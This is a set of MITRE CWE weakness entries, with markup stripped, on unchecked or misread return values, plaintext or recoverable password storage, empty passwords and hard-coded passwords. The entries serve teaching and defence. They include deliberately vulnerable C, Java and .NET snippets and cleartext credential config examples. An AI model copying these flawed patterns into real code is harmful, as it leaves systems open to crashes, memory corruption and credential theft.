Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Detection_Factors, Observed_Examples, References, Relationships, Type + + + CWE Content Team + MITRE + 2022-04-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + 4.10 + 2023-01-31 + Suggested mappings to ISA/IEC 62443. + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Often Misused: Privilege Management + Design Principle Violation: Failure to Use Least Privilege + + + + The product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions. + Two common programmer assumptions are "this function call can never fail" and "it doesn't matter if this function call fails". If an attacker can force the function to fail or otherwise return a value that is not expected, then the subsequent program logic could lead to a vulnerability, because the product is not in a state that the programmer assumes. For example, if the program calls a function to drop privileges but does not check the return code to ensure that privileges were successfully dropped, then the program will continue to operate with the higher privileges. + + + + + + + + Primary + + + + + + + Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function. + + + + Implementation + + + Low + + + Availability + Integrity + Unexpected State + DoS: Crash, Exit, or Restart + An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Check the results of all functions that return a value and verify that the value is expected. + High + Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. + + + Implementation + Ensure that you account for all possible return values from the function. + + + Implementation + When designing a function, make sure you return a value or throw an exception in case of an error. + + + + + Consider the following code segment: + + char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf); + + The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy(). + + + In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: + + int returnChunkSize(void *) { + + + /* if chunk info is valid, return the size of usable memory, + + + * else, return -1 to indicate an error + + + */ + ... + }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} + + If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). + + + The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc(). + + buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size); + + The traditional defense of this coding error is: "If my program runs out of memory, it will fail. It doesn't matter whether I handle the error or allow the program to die with a segmentation fault when it tries to dereference the null pointer." This argument ignores three important considerations: + + + + Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue. + + + It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state. + + + The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know. + + + + + + The following examples read a file into a byte array. + + char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {String userName = (String) i.Current();String pFileName = PFILE_ROOT + "/" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);} + + + FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) { + String userName = (String) i.next();String pFileName = PFILE_ROOT + "/" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray); + + + + + The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker. + + + The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference. + + String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {...}... + + The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference. + + String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {...}... + + The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. + + + The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined. + + System.clearProperty("os.name");...String os = System.getProperty("os.name");if (os.equalsIgnoreCase("Windows 95")) System.out.println("Not supported"); + + The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. + + + The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value. + + Dim MyFile As New FileStream("myfile.txt", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20)) + + In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. + + + It is not uncommon for Java programmers to misunderstand read() and related methods that are part of many java.io classes. Most errors and unusual events in Java result in an exception being thrown. But the stream and reader classes do not consider it unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. This behavior makes it important for programmers to examine the return value from read() and other IO methods to ensure that they receive the amount of data they expect. + + + This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); + } + + If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference + (CWE-476) would then occur in the call to strcpy(). + Note that this code is also vulnerable to a buffer overflow (CWE-119). + + + The following function attempts to acquire a lock in order to perform operations on a shared resource. + + void f(pthread_mutex_t *mutex) { + pthread_mutex_lock(mutex); + + /* access shared resource */ + + + pthread_mutex_unlock(mutex); + } + + However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. + In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. + + int f(pthread_mutex_t *mutex) { + int result; + result = pthread_mutex_lock(mutex);if (0 != result)return result; + + + /* access shared resource */ + + + return pthread_mutex_unlock(mutex); + } + + + + + + CVE-2020-17533 + Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862) + https://www.cve.org/CVERecord?id=CVE-2020-17533 + + + CVE-2020-6078 + Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476) + https://www.cve.org/CVERecord?id=CVE-2020-6078 + + + CVE-2019-15900 + Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863). + https://www.cve.org/CVERecord?id=CVE-2019-15900 + + + CVE-2007-3798 + Unchecked return value leads to resultant integer overflow and code execution. + https://www.cve.org/CVERecord?id=CVE-2007-3798 + + + CVE-2006-4447 + Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. + https://www.cve.org/CVERecord?id=CVE-2006-4447 + + + CVE-2006-2916 + Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. + https://www.cve.org/CVERecord?id=CVE-2006-2916 + + + CVE-2008-5183 + chain: unchecked return value can lead to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2008-5183 + + + CVE-2010-0211 + chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824). + https://www.cve.org/CVERecord?id=CVE-2010-0211 + + + CVE-2017-6964 + Linux-based device mapper encryption program does not check the return value of setuid and setgid allowing attackers to execute code with unintended privileges. + https://www.cve.org/CVERecord?id=CVE-2017-6964 + + + + + Unchecked Return Value + + + Ignored function return value + + + A7 + Improper Error Handling + CWE More Specific + + + ERR33-C + Detect and handle standard library errors + Imprecise + + + POS54-C + Detect and handle POSIX library errors + Imprecise + + + EXP00-J + Do not ignore values returned by methods + + + EXP32-PL + Do not ignore function return values + Exact + + + SFP4 + Unchecked Status Condition + + + ASCSM-CWE-252-resource + + + ASCRM-CWE-252-data + + + ASCRM-CWE-252-resource + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Background_Details, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Observed_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Observed_Examples, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + Martin Sebor + Cisco Systems, Inc. + 2010-04-30 + Provided Demonstrative Example and suggested CERT reference + + + + + The product incorrectly checks a return value from a function, which prevents it from detecting errors or exceptional conditions. + Important and common functions will return some value about the success of its actions. This will alert the program whether or not to handle any errors caused by that function. + + + + + + + + + + Implementation + + + Low + + + Availability + Integrity + Unexpected State + DoS: Crash, Exit, or Restart + An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors. + + + + + Architecture and Design + Language Selection + Use a language or compiler that uses exceptions and requires the catching of those exceptions. + + + Implementation + Properly check all functions which return a value. + + + Implementation + When designing any function make sure you return a value or throw an exception in case of an error. + + + + + This code attempts to allocate memory for 4 integers and checks if the allocation succeeds. + + tmp = malloc(sizeof(int) * 4);if (tmp < 0 ) { + perror("Failure"); + //should have checked if the call returned 0 + + + } + + The code assumes that only a negative return value would indicate an error, but malloc() may return a null pointer when there is an error. The value of tmp could then be equal to 0, and the error would be missed. + + + + + Misinterpreted function return value + + + SFP4 + Unchecked Status Condition + + + ERR33-C + Detect and handle standard library errors + Imprecise + + + POS54-C + Detect and handle POSIX library errors + Imprecise + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Misinterpreted Function Return Value + + + + Storing a password in plaintext may result in a system compromise. + Password management issues occur when a password is stored in plaintext in an application's properties, configuration file, or memory. Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource. In some contexts, even storage of a plaintext password in memory is considered a security risk if the password is not cleared immediately after it is used. + + + + + + Primary + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Architecture and Design + Developers sometimes believe that they cannot defend the application from someone who has access to the configuration, but this belief makes an attacker's job easier. + + + High + + + Access Control + Gain Privileges or Assume Identity + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Avoid storing passwords in easily accessible locations. + + + Architecture and Design + Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext. + + + A programmer might attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password because the encoding can be detected and decoded easily. + None + + + + + The following code reads a password from a properties file and uses the password to connect to a database. + + ...Properties prop = new Properties();prop.load(new FileInputStream("config.properties"));String password = prop.getProperty("password");DriverManager.getConnection(url, usr, password);... + + This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system. + + + The following code reads a password from the registry and uses the password to create a new network credential. + + ...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);... + + This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. + This Java example shows a properties file with a cleartext username / password pair. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + At least one OT product stored a password in plaintext. + + + + + CVE-2022-30275 + Remote Terminal Unit (RTU) uses a driver that relies on a password stored in plaintext. + https://www.cve.org/CVERecord?id=CVE-2022-30275 + + + + + Password Management + + + SFP23 + Exposed Data + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Name, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Plaintext Storage + Plaintext Storage of a Password + Plaintext Storage of a Password + Unprotected Storage of Credentials + + + + The storage of passwords in a recoverable format makes them subject to password reuse attacks by malicious users. In fact, it should be noted that recoverable encrypted passwords provide no significant benefit over plaintext passwords since they are subject not only to reuse by malicious attackers but also by malicious insiders. If a system administrator can recover a password directly, or use a brute force search on the available information, the administrator can use the password on other accounts. + + + + + + + Primary + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + High + + + Confidentiality + Access Control + Gain Privileges or Assume Identity + User's passwords may be revealed. + + + Access Control + Gain Privileges or Assume Identity + Revealed passwords may be reused elsewhere to impersonate the users in question. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Use strong, non-reversible encryption to protect stored passwords. + + + + + Both of these examples verify a password by comparing it to a stored compressed version. + + int VerifyAdmin(char *password) {if (strcmp(compress(password), compressed_password)) {printf("Incorrect Password!\n");return(0);}printf("Entering Diagnostic Mode...\n");return(1);} + + + int VerifyAdmin(String password) {if (passwd.Equals(compress(password), compressed_password)) {return(0);} + //Diagnostic Mode + return(1);} + + Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database. + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. + This Java example shows a properties file with a cleartext username / password pair. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + + + Storing passwords in a recoverable format + + + SFP23 + Exposed Data + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The meaning of this entry needs to be investigated more closely, especially with respect to what is meant by "recoverable." + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Using an empty string as a password is insecure. + + + + + + + Primary + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + High + + + Access Control + Gain Privileges or Assume Identity + + + + + System Configuration + Passwords should be at least eight characters long -- the longer the better. Avoid passwords that are in any way similar to other passwords you have. Avoid using words that may be found in a dictionary, names book, on a map, etc. Consider incorporating numbers and/or punctuation into your password. If you do use common words, consider replacing letters in that word with numbers and punctuation. However, do not use "similar-looking" punctuation. For example, it is not a good idea to change cat to c@t, ca+, (@+, or anything similar. Finally, it is never appropriate to use an empty string as a password. + + + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but the password is provided as an empty string. + This Java example shows a properties file with an empty password string. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database and the password is provided as an empty string. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + An empty string should never be used as a password as this can allow unauthorized access to the application. Username and password information should not be included in a configuration file or a properties file in clear text. If possible, encrypt this information and avoid CWE-260 and CWE-13. + + + + + Password Management: Empty Password in Configuration File + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components. + + A hard-coded password typically leads to a significant authentication failure that can be difficult for the system administrator to detect. Once detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations: + + Inbound: the product contains an authentication mechanism that checks for a hard-coded password. + Outbound: the product connects to another system or component, and it contains hard-coded password for connecting to that component. + + In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the product. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the product will have the same password, even across different organizations, this enables massive attacks such as worms to take place. + The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end product. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple. + + + + + + + + + + + Primary + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Architecture and Design + + + High + + + Access Control + Gain Privileges or Assume Identity + If hard-coded passwords are used, it is almost certain that malicious users will gain access through the account in question. + + + + + Manual Analysis + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Black Box + + Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. + Attach the monitor to the process and perform a login. Using disassembled code, look at the associated instructions and see if any of them appear to be comparing the input to a fixed string or value. + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + For outbound authentication: store passwords outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible. + + + Architecture and Design + For inbound authentication: Rather than hard-code a default username and password for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password. + + + 